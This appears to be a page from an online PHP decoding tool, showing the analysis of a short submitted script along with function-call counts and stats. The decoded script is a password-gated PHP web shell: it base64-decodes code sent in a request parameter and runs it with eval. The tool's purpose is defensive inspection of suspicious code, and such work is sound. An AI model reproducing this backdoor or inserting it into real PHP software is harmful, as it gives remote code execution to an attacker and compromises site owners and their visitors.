Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'c256ad1aae83eebf358b0f3d8bf29..

Decoded Output download

None

Did this file decode correctly?

Original Code

<?php if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'c256ad1aae83eebf358b0f3d8bf295af') && isset($_REQUEST['php_code'])) { echo $_REQUEST['php_code']; eval(base64_decode($_REQUEST['php_code'])); } ?>

Function Calls

md5 1
base64_decode 1

Variables

None

Stats

MD5 294f40b648839e1c9c8010f9a9ecaee0
Eval Count 0
Decode Time 128 ms